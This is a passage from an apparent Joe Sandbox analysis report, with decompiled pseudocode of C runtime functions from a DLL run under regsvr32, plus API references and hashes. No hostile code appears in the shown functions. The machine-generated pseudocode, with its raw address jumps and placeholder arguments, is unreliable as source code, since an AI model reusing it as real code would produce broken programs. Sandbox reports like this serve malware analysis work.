				_t47 =  *((intOrPtr*)(_t44 + 0xf0));
				_t54 =  *((intOrPtr*)(_t47 + 0x28));
				E00007FFD7FFD2B07EA0C(_t33,  *((long long*)(_t46 + 0x30)), _t44, __rdx, _t54);
				E00007FFD7FFD2B067F5C(_t33, _t41, _t44, __rdx, __rsi, __r8);
				 *((long long*)(__rdx + 0x10)) =  *((intOrPtr*)(_t44 + 0xf0));
				E00007FFD7FFD2B067F5C(_t33, _t41, _t44,  *((intOrPtr*)(_t44 + 0xf0)), __rsi, __r8);
				_t52 =  *((intOrPtr*)(_t44 + 0xf8));
				 *((long long*)(__rdx + 0x18)) =  *((intOrPtr*)(_t44 + 0xf8));
				E00007FFD7FFD2B067F5C(_t33, _t41, _t44,  *((intOrPtr*)(_t44 + 0xf8)), _t56, _t61);
				 *((long long*)(_t44 + 0xf0)) = _t47;
				goto 0x2b07f2de;
				 *(_t54 + 0x10) =  *(_t54 + 0x10) | 0xffffffff;
				 *(_t54 + 0x18) =  *(_t54 + 0x18) | 0xffffffff;
				E00007FFD7FFD2B067F5C(_t33, _t41, _t44,  *((intOrPtr*)(_t44 + 0xf8)), _t56, _t61);
				 *(_t44 + 0x100) =  *(_t44 + 0x100) - 1;
				E00007FFD7FFD2B067F5C(_t33, _t41, _t44, _t52, _t56, _t61);
				if ( *(_t44 + 0x100) >= 0) goto 0x2b07f303;
				E00007FFD7FFD2B067F5C(_t33,  *(_t44 + 0x100), _t44, _t52, _t56, _t61);
				 *(_t44 + 0x100) =  *(_t44 + 0x100) & 0x00000000;
				return 1;
			}

0x7ffd2b07f244
0x7ffd2b07f244
0x7ffd2b07f244
0x7ffd2b07f244
0x7ffd2b07f254
0x7ffd2b07f256
0x7ffd2b07f25c
0x7ffd2b07f264
0x7ffd2b07f26a
0x7ffd2b07f273
0x7ffd2b07f27c
0x7ffd2b07f285
0x7ffd2b07f287
0x7ffd2b07f28c
0x7ffd2b07f28e
0x7ffd2b07f293
0x7ffd2b07f29a
0x7ffd2b07f2a1
0x7ffd2b07f2a6
0x7ffd2b07f2b2
0x7ffd2b07f2b6
0x7ffd2b07f2bb
0x7ffd2b07f2c2
0x7ffd2b07f2c6
0x7ffd2b07f2cb
0x7ffd2b07f2d2
0x7ffd2b07f2d4
0x7ffd2b07f2d9
0x7ffd2b07f2de
0x7ffd2b07f2e3
0x7ffd2b07f2e9
0x7ffd2b07f2f5
0x7ffd2b07f2f7
0x7ffd2b07f2fc
0x7ffd2b07f312

APIs

_getptd.LIBCMT ref: 00007FFD2B07F28E
_CreateFrameInfo.LIBCMT ref: 00007FFD2B07F2A1
_getptd.LIBCMT ref: 00007FFD2B07F2A6
_getptd.LIBCMT ref: 00007FFD2B07F2B6
_getptd.LIBCMT ref: 00007FFD2B07F2C6
_getptd.LIBCMT ref: 00007FFD2B07F2DE
_getptd.LIBCMT ref: 00007FFD2B07F2E9
_getptd.LIBCMT ref: 00007FFD2B07F2F7

Strings

csm, xrefs: 00007FFD2B07F25E

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _getptd$CreateFrameInfo
String ID: csm
API String ID: 4181383844-1018135373
Opcode ID: 4275ce68d65128f1caca79e562f1c792041253e0e39948ca886fefc6bb3175a3
Instruction ID: ef15f1f14b8805df545830a913ddec568d1a2e3f98a826b779657ce2aac080b8
Opcode Fuzzy Hash: 4275ce68d65128f1caca79e562f1c792041253e0e39948ca886fefc6bb3175a3
Instruction Fuzzy Hash: 9F218636A0574385EB659F10C9213BC73A0FB56B64F184334DA6D032D2CFB8E491E6C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B077044 Relevance: 15.3, APIs: 10, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00007FFD7FFD2B077044(signed long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9) {
				void* _v40;
				signed int _v48;
				char _v65;
				intOrPtr _v66;
				signed short _v72;
				signed long long _v96;
				signed int _v104;
				char _v120;
				char _v128;
				char _v136;
				long long _v144;
				long long _v152;
				void* __rdi;
				signed int _t102;
				signed int _t133;
				signed int _t138;
				void* _t140;
				intOrPtr _t166;
				signed long long _t169;
				signed long long _t170;
				intOrPtr* _t171;
				signed int _t172;
				long long _t174;
				signed long long _t182;
				signed char* _t188;
				signed char* _t193;
				signed long long _t210;
				int _t221;
				long long _t222;
				long long _t224;
				intOrPtr* _t227;
				long long _t228;
				void* _t230;
				void* _t235;
				void* _t238;
				void* _t240;
				signed long long _t241;
				void* _t243;
				signed long long _t244;
				void* _t246;
				signed long long _t247;
				void* _t249;
				signed long long _t250;

				_t235 = __r9;
				_t224 = __rsi;
				_t182 = __rbx;
				_t238 = _t230;
				 *((long long*)(_t238 + 0x10)) = __rbx;
				 *((long long*)(_t238 + 0x18)) = __rbp;
				 *((long long*)(_t238 + 0x20)) = __rsi;
				_t169 =  *0x2b0c70a0; // 0xf787487f4682
				_t170 = _t169 ^ _t230 - 0x00000090;
				_v48 = _t170;
				_t222 = __rcx;
				 *((long long*)(_t238 - 0x58)) = __rcx;
				_v96 = __rbx;
				r13d = 0;
				r15d = 0;
				r14d = 0;
				r12d = 0;
				 *((long long*)(_t238 - 0x50)) = __rbx;
				if ( *((intOrPtr*)(__rcx + 0x14)) == 0) goto 0x2b0773df;
				_t227 = __rcx + 4;
				_t10 = _t182 + 1; // 0x1
				_t140 = _t10;
				if ( *_t227 != 0) goto 0x2b0770cb;
				r8d =  *(__rcx + 0x30) & 0x0000ffff;
				r9d = 0x1004;
				_v152 = _t227;
				if (E00007FFD7FFD2B072BF4(0, _t238 - 0x58, __r8) != 0) goto 0x2b0773af;
				E00007FFD7FFD2B0678EC(4, E00007FFD7FFD2B072BF4(0, _t238 - 0x58, __r8), __rbx, _t238 - 0x58, __rcx, __rsi);
				r12d = 0x180;
				_v96 = _t170;
				E00007FFD7FFD2B06796C(_t182, _t238 - 0x58, __rdx, _t222, _t224, _t227, _t249, _t246);
				_t244 = _t170;
				E00007FFD7FFD2B06796C(_t182, _t238 - 0x58, _t224, _t222, _t224, _t227, _t243, _t240);
				_t250 = _t170;
				E00007FFD7FFD2B06796C(_t182, _t238 - 0x58, _t224, _t222, _t224, _t227);
				_t247 = _t170;
				E00007FFD7FFD2B06796C(_t182, _t238 - 0x58, _t224, _t222, _t224, _t227);
				_t241 = _t170;
				_t171 = _v96;
				if (_t171 == 0) goto 0x2b0773af;
				if (_t244 == 0) goto 0x2b0773af;
				if (_t241 == 0) goto 0x2b0773af;
				if (_t250 == 0) goto 0x2b0773af;
				if (_t247 == 0) goto 0x2b0773af;
				 *_t171 = 0;
				 *_t241 = 0;
				if (0 + _t140 - 0x100 < 0) goto 0x2b077155;
				if (GetCPInfo(_t221) == 0) goto 0x2b0773af;
				if (_v72 - 5 > 0) goto 0x2b0773af;
				_t102 = _v72 & 0x0000ffff;
				_v104 = _t102;
				if (_t102 - _t140 <= 0) goto 0x2b0771c0;
				if (_v66 == 0) goto 0x2b0771c0;
				_t22 =  &_v65; // 0x1f7
				_t188 = _t22;
				if ( *_t188 == 0) goto 0x2b0771c0;
				_t133 =  *(_t188 - 1) & 0x000000ff;
				goto 0x2b0771b0;
				_t172 = _t133;
				 *((char*)(_t172 + _t241)) = 0x20;
				if (_t133 + _t140 - ( *_t188 & 0x000000ff) <= 0) goto 0x2b0771a6;
				if ( *((intOrPtr*)( &(_t188[2]) - 1)) != 0) goto 0x2b07719c;
				_v128 = 0;
				_t27 = _t244 + 0x100; // 0x100
				_v136 = 0;
				_v144 =  *_t227;
				_v152 = _t27;
				r9d = 0x100;
				if (E00007FFD7FFD2B075684(_t140,  *((intOrPtr*)( &(_t188[2]) - 1)), _t172, _t182, _t27, _t224, _t241, _t235) == 0) goto 0x2b0773af;
				_v120 = 0;
				_v128 =  *_t227;
				_t34 = _t250 + 0x81; // 0x81
				_v136 = 0xff;
				_v144 = _t34;
				_t37 = _t172 + 1; // 0x100
				r8d = _t37;
				_t38 = _t241 + 1; // 0x1
				_v152 = 0xff;
				if (E00007FFD7FFD2B07548C( *((intOrPtr*)(_t222 + 0x14)), E00007FFD7FFD2B075684(_t140,  *((intOrPtr*)( &(_t188[2]) - 1)), _t172, _t182, _t27, _t224, _t241, _t235), _t172, _t182, _t34, _t224, _t241, _t38) == 0) goto 0x2b0773af;
				_v120 = 0;
				_v128 =  *_t227;
				_t43 = _t247 + 0x81; // 0x81
				_v136 = 0xff;
				_v144 = _t43;
				_t46 = _t241 + 1; // 0x1
				r8d = 0x200;
				_v152 = 0xff;
				if (E00007FFD7FFD2B07548C( *((intOrPtr*)(_t222 + 0x14)), E00007FFD7FFD2B07548C( *((intOrPtr*)(_t222 + 0x14)), E00007FFD7FFD2B075684(_t140,  *((intOrPtr*)( &(_t188[2]) - 1)), _t172, _t182, _t27, _t224, _t241, _t235), _t172, _t182, _t34, _t224, _t241, _t38), _t172, _t182, _t43, _t224, _t241, _t46) == 0) goto 0x2b0773af;
				_t48 = _t244 + 0xfe; // 0xfe
				_t228 = _t48;
				 *_t228 = 0;
				 *((char*)(_t250 + 0x7f)) = 0;
				 *((char*)(_t247 + 0x7f)) = 0;
				 *((char*)(_t250 + 0x80)) = 0;
				 *((char*)(_t247 + 0x80)) = 0;
				if (_v104 - _t140 <= 0) goto 0x2b0772d5;
				if (_v66 == 0) goto 0x2b0772d5;
				_t55 =  &_v65; // 0x1f7
				_t193 = _t55;
				if ( *_t193 == 0) goto 0x2b0772d5;
				_t138 =  *(_t193 - 1) & 0x000000ff;
				goto 0x2b0772c5;
				r8d = 0x8000;
				 *((intOrPtr*)(_t244 + 0x100 + _t138 * 2)) = r8w;
				if (_t138 + _t140 - ( *_t193 & 0x000000ff) <= 0) goto 0x2b0772b1;
				if ( *((intOrPtr*)( &(_t193[2]) - 1)) != 0) goto 0x2b0772a7;
				_t61 = _t244 + 0x200; // 0x200
				r8d = 0xfe;
				E00007FFD7FFD2B064B80(0,  *((intOrPtr*)( &(_t193[2]) - 1)), _t244, _t61, _t241);
				_t62 = _t250 + 0x100; // 0x100
				r8d = 0x7f;
				E00007FFD7FFD2B064B80(0,  *((intOrPtr*)( &(_t193[2]) - 1)), _t250, _t62, _t241);
				_t63 = _t247 + 0x100; // 0x100
				r8d = 0x7f;
				E00007FFD7FFD2B064B80(0,  *((intOrPtr*)( &(_t193[2]) - 1)), _t247, _t63, _t241);
				_t166 =  *((intOrPtr*)(_t222 + 0x130));
				if (_t166 == 0) goto 0x2b077364;
				asm("lock dec dword [ecx]");
				if (_t166 != 0) goto 0x2b077364;
				free(??);
				free(??);
				free(??);
				free(??);
				_t174 = _v96;
				 *_t174 = _t140;
				 *((long long*)(_t222 + 0x130)) = _t174;
				_t71 = _t244 + 0x100; // 0x100
				 *((long long*)(_t222 + 0x140)) = _t71;
				_t73 = _t250 + 0x80; // 0x80
				 *((long long*)(_t222 + 0x138)) = _t228;
				 *((long long*)(_t222 + 0x148)) = _t73;
				_t76 = _t247 + 0x80; // 0x80
				 *((long long*)(_t222 + 0x150)) = _t76;
				 *(_t222 + 0x10c) = _v104;
				goto 0x2b0773d3;
				free(??);
				free(??);
				free(??);
				free(??);
				_t210 = _t241;
				free(??);
				goto 0x2b077433;
				if ( *(_t210 + 0x130) == 0) goto 0x2b0773ee;
				asm("lock dec dword [eax]");
				 *(_t210 + 0x130) = _t182;
				 *((long long*)(_t210 + 0x140)) = 0x2b084960;
				 *(_t210 + 0x138) = _t182;
				 *((long long*)(_t210 + 0x148)) = 0x2b084df0;
				 *((intOrPtr*)(_t210 + 0x10c)) = 1;
				 *((long long*)(_t210 + 0x150)) = 0x2b084f70;
				return E00007FFD7FFD2B064980(0, _v48 ^ _t230 - 0x00000090, _t63, _t241);
			}

0x7ffd2b077044
0x7ffd2b077044
0x7ffd2b077044
0x7ffd2b077044
0x7ffd2b077047
0x7ffd2b07704b
0x7ffd2b07704f
0x7ffd2b077063
0x7ffd2b07706a
0x7ffd2b07706d
0x7ffd2b077077
0x7ffd2b07707a
0x7ffd2b07707e
0x7ffd2b077083
0x7ffd2b077086
0x7ffd2b077089
0x7ffd2b07708c
0x7ffd2b07708f
0x7ffd2b077096
0x7ffd2b07709c
0x7ffd2b0770a0
0x7ffd2b0770a0
0x7ffd2b0770a6
0x7ffd2b0770a8
0x7ffd2b0770b3
0x7ffd2b0770b9
0x7ffd2b0770c5
0x7ffd2b0770d0
0x7ffd2b0770d5
0x7ffd2b0770e3
0x7ffd2b0770e8
0x7ffd2b0770f3
0x7ffd2b0770f6
0x7ffd2b077101
0x7ffd2b077104
0x7ffd2b077111
0x7ffd2b077114
0x7ffd2b077119
0x7ffd2b07711c
0x7ffd2b077124
0x7ffd2b07712d
0x7ffd2b077136
0x7ffd2b07713f
0x7ffd2b077148
0x7ffd2b07714e
0x7ffd2b077155
0x7ffd2b077161
0x7ffd2b077173
0x7ffd2b07717e
0x7ffd2b077184
0x7ffd2b077189
0x7ffd2b07718f
0x7ffd2b077195
0x7ffd2b077197
0x7ffd2b077197
0x7ffd2b07719e
0x7ffd2b0771a0
0x7ffd2b0771a4
0x7ffd2b0771a6
0x7ffd2b0771ab
0x7ffd2b0771b5
0x7ffd2b0771be
0x7ffd2b0771c3
0x7ffd2b0771c7
0x7ffd2b0771ce
0x7ffd2b0771d2
0x7ffd2b0771d6
0x7ffd2b0771dd
0x7ffd2b0771ef
0x7ffd2b0771fb
0x7ffd2b0771ff
0x7ffd2b077208
0x7ffd2b07720f
0x7ffd2b077213
0x7ffd2b077218
0x7ffd2b077218
0x7ffd2b07721c
0x7ffd2b077223
0x7ffd2b07722e
0x7ffd2b07723a
0x7ffd2b07723e
0x7ffd2b077247
0x7ffd2b07724e
0x7ffd2b077252
0x7ffd2b077257
0x7ffd2b07725e
0x7ffd2b077264
0x7ffd2b07726f
0x7ffd2b077275
0x7ffd2b077275
0x7ffd2b07727c
0x7ffd2b077280
0x7ffd2b077284
0x7ffd2b077288
0x7ffd2b07728f
0x7ffd2b07729a
0x7ffd2b0772a0
0x7ffd2b0772a2
0x7ffd2b0772a2
0x7ffd2b0772a9
0x7ffd2b0772ab
0x7ffd2b0772af
0x7ffd2b0772b4
0x7ffd2b0772bc
0x7ffd2b0772ca
0x7ffd2b0772d3
0x7ffd2b0772d5
0x7ffd2b0772dc
0x7ffd2b0772e5
0x7ffd2b0772ea
0x7ffd2b0772f1
0x7ffd2b0772fa
0x7ffd2b0772ff
0x7ffd2b077306
0x7ffd2b07730f
0x7ffd2b07731b
0x7ffd2b07731e
0x7ffd2b077320
0x7ffd2b077323
0x7ffd2b077333
0x7ffd2b077343
0x7ffd2b077353
0x7ffd2b07735f
0x7ffd2b077364
0x7ffd2b077369
0x7ffd2b07736b
0x7ffd2b077372
0x7ffd2b077379
0x7ffd2b077380
0x7ffd2b077387
0x7ffd2b07738e
0x7ffd2b077395
0x7ffd2b07739c
0x7ffd2b0773a7
0x7ffd2b0773ad
0x7ffd2b0773b4
0x7ffd2b0773bc
0x7ffd2b0773c4
0x7ffd2b0773cc
0x7ffd2b0773d3
0x7ffd2b0773d6
0x7ffd2b0773dd
0x7ffd2b0773e9
0x7ffd2b0773eb
0x7ffd2b0773fa
0x7ffd2b077401
0x7ffd2b07740f
0x7ffd2b077416
0x7ffd2b077424
0x7ffd2b07742a
0x7ffd2b077463

APIs

GetCPInfo.KERNEL32 ref: 00007FFD2B07716B

Part of subcall function 00007FFD2B072BF4: GetLastError.KERNEL32 ref: 00007FFD2B072C58
Part of subcall function 00007FFD2B072BF4: free.LIBCMT ref: 00007FFD2B072CD6

free.LIBCMT ref: 00007FFD2B077333
free.LIBCMT ref: 00007FFD2B077343
free.LIBCMT ref: 00007FFD2B077353
free.LIBCMT ref: 00007FFD2B07735F
free.LIBCMT ref: 00007FFD2B0773B4
free.LIBCMT ref: 00007FFD2B0773BC
free.LIBCMT ref: 00007FFD2B0773C4
free.LIBCMT ref: 00007FFD2B0773CC
free.LIBCMT ref: 00007FFD2B0773D6

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: free$ErrorInfoLast
String ID:
API String ID: 189849726-0
Opcode ID: 5b3cedf5892a88679238b254cc7ed3fbde736adc97075d0204ee1f638311c18d
Instruction ID: eb96626d663aab8b4534e83d9c8e73291cb638b7e44703c64adeb5e41233c68e
Opcode Fuzzy Hash: 5b3cedf5892a88679238b254cc7ed3fbde736adc97075d0204ee1f638311c18d
Instruction Fuzzy Hash: EBB1E432B0A6928AE712CF25D9603ADB7A4FB4A784F444135EB8C877A5DF7DE401E740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B068188 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00007FFD7FFD2B068188(intOrPtr __rax, long long __rbx, void* __rdx, long long __rdi) {
				signed char _t83;
				signed int _t84;
				intOrPtr _t90;
				intOrPtr _t93;
				void* _t95;
				intOrPtr _t99;
				intOrPtr _t101;
				signed int _t104;
				intOrPtr _t106;
				intOrPtr _t138;
				intOrPtr _t140;
				void* _t142;
				long long _t147;
				struct _STARTUPINFOW* _t149;
				intOrPtr _t163;
				void* _t164;
				void* _t166;
				intOrPtr _t171;
				void* _t173;
				long long _t174;
				long long* _t177;
				void* _t180;
				void* _t181;
				void* _t184;
				intOrPtr* _t186;
				void* _t189;
				signed char* _t190;
				struct _STARTUPINFOW* _t193;

				_t162 = __rdx;
				_t148 = __rbx;
				_t138 = __rax;
				 *((long long*)(_t180 + 8)) = __rbx;
				 *((long long*)(_t180 + 0x10)) = _t174;
				 *((long long*)(_t180 + 0x18)) = __rdi;
				_t181 = _t180 - 0x90;
				GetStartupInfoW(_t193);
				_t5 = _t162 - 0x38; // 0x20
				_t106 = _t5;
				E00007FFD7FFD2B06796C(__rbx, _t181 + 0x20, __rdx, __rdi, _t173, _t174, _t189, _t184);
				r14d = 0;
				_t163 = _t138;
				if (_t138 != 0) goto 0x2b0681d1;
				goto 0x2b06843c;
				 *0x2b0c9da0 = _t138;
				 *0x2b0c9d84 = _t106;
				if (_t163 - _t138 + 0xb00 >= 0) goto 0x2b068230;
				_t164 = _t163 + 9;
				 *(_t164 - 9) =  *(_t164 - 9) | 0xffffffff;
				 *((short*)(_t164 - 1)) = 0xa00;
				 *(_t164 + 3) = r14d;
				 *((short*)(_t164 + 0x2f)) = 0xa00;
				 *((char*)(_t164 + 0x31)) = 0xa;
				 *(_t164 + 0x47) = r14d;
				 *((intOrPtr*)(_t164 + 0x43)) = r14b;
				_t140 =  *0x2b0c9da0; // 0xbe1220
				_t14 = _t164 + 0x58 - 9; // -106
				if (_t14 - _t140 + 0xb00 < 0) goto 0x2b0681ef;
				_t93 =  *0x2b0c9d84; // 0x20
				if ( *((intOrPtr*)(_t181 + 0x62)) == r14w) goto 0x2b068370;
				_t142 =  *((intOrPtr*)(_t181 + 0x68));
				if (_t142 == 0) goto 0x2b068370;
				_t190 = _t142 + 4;
				_t186 =  *_t142 + _t190;
				_t89 =  <  ?  *_t142 : 0x800;
				if (_t93 - 0x800 >= 0) goto 0x2b0682ed;
				E00007FFD7FFD2B06796C(_t148, _t174, _t164 + 0x58, 0x2b0c9da8, _t173, _t174);
				if (_t142 == 0) goto 0x2b0682e7;
				_t99 =  *0x2b0c9d84; // 0x20
				_t18 = _t142 + 0xb00; // 0xb00
				 *0x2b0c9da8 = _t142;
				 *0x2b0c9d84 = _t99 + _t106;
				if (_t142 - _t18 >= 0) goto 0x2b0682dd;
				_t19 = _t142 + 9; // 0x9
				_t166 = _t19;
				 *(_t166 - 9) =  *(_t166 - 9) | 0xffffffff;
				 *(_t166 + 0x2f) =  *(_t166 + 0x2f) & 0x00000080;
				 *((short*)(_t166 - 1)) = 0xa00;
				 *(_t166 + 3) = r14d;
				 *((short*)(_t166 + 0x30)) = 0xa0a;
				 *(_t166 + 0x47) = r14d;
				 *((intOrPtr*)(_t166 + 0x43)) = r14b;
				_t29 = _t166 + 0x58 - 9; // -88
				if (_t29 -  *0x2b0c9da8 + 0xb00 < 0) goto 0x2b0682a0;
				_t101 =  *0x2b0c9d84; // 0x20
				_t118 = _t101 - ( <  ?  *_t142 : 0x800);
				if (_t101 - ( <  ?  *_t142 : 0x800) < 0) goto 0x2b06826d;
				goto 0x2b0682ed;
				_t90 =  *0x2b0c9d84; // 0x20
				_t104 = r14d;
				if (_t90 <= 0) goto 0x2b068370;
				if ( *_t186 == 0xffffffff) goto 0x2b068363;
				if ( *_t186 == 0xfffffffe) goto 0x2b068363;
				if (( *_t190 & 0x00000001) == 0) goto 0x2b068363;
				if (( *_t190 & 0x00000008) != 0) goto 0x2b06831e;
				if (GetFileType(??) == 0) goto 0x2b068363;
				_t177 = _t104 * 0x58 +  *((intOrPtr*)(0x2b0c9da0 + (_t104 >> 5) * 8));
				_t147 =  *_t186;
				 *_t177 = _t147;
				 *((char*)(_t177 + 8)) =  *_t190;
				if (InitializeCriticalSectionAndSpinCount(??, ??) == 0) goto 0x2b0681c9;
				 *((intOrPtr*)(_t177 + 0xc)) =  *((intOrPtr*)(_t177 + 0xc)) + 1;
				if (_t104 + 1 - _t90 < 0) goto 0x2b0682f4;
				r12d = r14d;
				_t149 = _t193;
				_t171 =  *0x2b0c9da0; // 0xbe1220
				if ( *((long long*)(_t149 + _t171)) == 0xffffffff) goto 0x2b068395;
				if ( *((long long*)(_t149 + _t171)) == 0xfffffffe) goto 0x2b068395;
				 *(_t149 + _t171 + 8) =  *(_t149 + _t171 + 8) | 0x00000080;
				goto 0x2b06841a;
				 *(_t149 + _t171 + 8) = 0x81;
				asm("sbb ecx, ecx");
				_t95 =  ==  ? 0xfffffff6 : _t93 + 0xfffffff5;
				GetStdHandle(??);
				if (_t147 == 0xffffffff) goto 0x2b06840d;
				if (_t147 == 0) goto 0x2b06840d;
				_t83 = GetFileType(??);
				if (_t83 == 0) goto 0x2b06840d;
				_t84 = _t83 & 0x000000ff;
				 *((long long*)(_t149 + _t171)) = _t147;
				if (_t84 != 2) goto 0x2b0683e5;
				 *(_t149 + _t171 + 8) =  *(_t149 + _t171 + 8) | 0x00000040;
				goto 0x2b0683ef;
				if (_t84 != 3) goto 0x2b0683ef;
				 *(_t149 + _t171 + 8) =  *(_t149 + _t171 + 8) | 0x00000008;
				if (InitializeCriticalSectionAndSpinCount(??, ??) == 0) goto 0x2b0681c9;
				 *((intOrPtr*)(_t149 + _t171 + 0xc)) =  *((intOrPtr*)(_t149 + _t171 + 0xc)) + 1;
				goto 0x2b06841a;
				 *(_t149 + _t171 + 8) =  *(_t149 + _t171 + 8) | 0x00000040;
				 *((long long*)(_t149 + _t171)) = 0xfffffffe;
				r12d = r12d + 1;
				if (_t149 + 0x58 - 0x108 < 0) goto 0x2b068376;
				SetHandleCount(??);
				return 0;
			}

0x7ffd2b068188
0x7ffd2b068188
0x7ffd2b068188
0x7ffd2b068188
0x7ffd2b06818d
0x7ffd2b068192
0x7ffd2b06819d
0x7ffd2b0681a9
0x7ffd2b0681b4
0x7ffd2b0681b4
0x7ffd2b0681b9
0x7ffd2b0681be
0x7ffd2b0681c1
0x7ffd2b0681c7
0x7ffd2b0681cc
0x7ffd2b0681d1
0x7ffd2b0681e0
0x7ffd2b0681e9
0x7ffd2b0681eb
0x7ffd2b0681ef
0x7ffd2b0681f4
0x7ffd2b0681fa
0x7ffd2b0681fe
0x7ffd2b068204
0x7ffd2b068208
0x7ffd2b06820c
0x7ffd2b068210
0x7ffd2b06821b
0x7ffd2b068228
0x7ffd2b06822a
0x7ffd2b068236
0x7ffd2b06823c
0x7ffd2b068244
0x7ffd2b068252
0x7ffd2b068256
0x7ffd2b06825b
0x7ffd2b068260
0x7ffd2b068275
0x7ffd2b06827d
0x7ffd2b06827f
0x7ffd2b068285
0x7ffd2b06828c
0x7ffd2b068291
0x7ffd2b06829a
0x7ffd2b06829c
0x7ffd2b06829c
0x7ffd2b0682a0
0x7ffd2b0682a5
0x7ffd2b0682a9
0x7ffd2b0682af
0x7ffd2b0682b3
0x7ffd2b0682b9
0x7ffd2b0682bd
0x7ffd2b0682c8
0x7ffd2b0682d5
0x7ffd2b0682d7
0x7ffd2b0682e1
0x7ffd2b0682e3
0x7ffd2b0682e5
0x7ffd2b0682e7
0x7ffd2b0682ed
0x7ffd2b0682f2
0x7ffd2b0682f9
0x7ffd2b068300
0x7ffd2b068307
0x7ffd2b06830e
0x7ffd2b06831c
0x7ffd2b06833b
0x7ffd2b06833f
0x7ffd2b068343
0x7ffd2b06834f
0x7ffd2b06835a
0x7ffd2b068360
0x7ffd2b06836e
0x7ffd2b068370
0x7ffd2b068373
0x7ffd2b068376
0x7ffd2b068382
0x7ffd2b068389
0x7ffd2b06838b
0x7ffd2b068390
0x7ffd2b06839a
0x7ffd2b0683a6
0x7ffd2b0683ae
0x7ffd2b0683b1
0x7ffd2b0683be
0x7ffd2b0683c3
0x7ffd2b0683c8
0x7ffd2b0683d0
0x7ffd2b0683d2
0x7ffd2b0683d5
0x7ffd2b0683dc
0x7ffd2b0683de
0x7ffd2b0683e3
0x7ffd2b0683e8
0x7ffd2b0683ea
0x7ffd2b068401
0x7ffd2b068407
0x7ffd2b06840b
0x7ffd2b06840d
0x7ffd2b068412
0x7ffd2b06841e
0x7ffd2b068428
0x7ffd2b068434
0x7ffd2b068459

APIs

GetStartupInfoW.KERNEL32 ref: 00007FFD2B0681A9

Part of subcall function 00007FFD2B06796C: Sleep.KERNEL32(?,?,?,00007FFD2B067F0B,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B0679B1

GetFileType.KERNEL32 ref: 00007FFD2B068314
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFD2B068352

Strings

@, xrefs: 00007FFD2B06840D

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
String ID: @
API String ID: 3473179607-2766056989
Opcode ID: e02c93909526c4f236752285605e8c27f2e0304d9560b3fbe4c2ca2a6fe07655
Instruction ID: c6dca8129353b87fa35821f07d3ea6d0a0e1ecaebd2a3fbd1e7bea0e2300e058
Opcode Fuzzy Hash: e02c93909526c4f236752285605e8c27f2e0304d9560b3fbe4c2ca2a6fe07655
Instruction Fuzzy Hash: 9381A021B0AB828AEB168F14DA643392790FB46B74F044335CA7D062F1DFBCE455E788

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06B494 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 70
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00007FFD7FFD2B06B494(void* __edx, long long __rbx, long long __rcx, long long _a8) {
				char _v24;
				char _v40;
				signed int _v48;
				char _v56;
				intOrPtr _t13;
				char _t20;
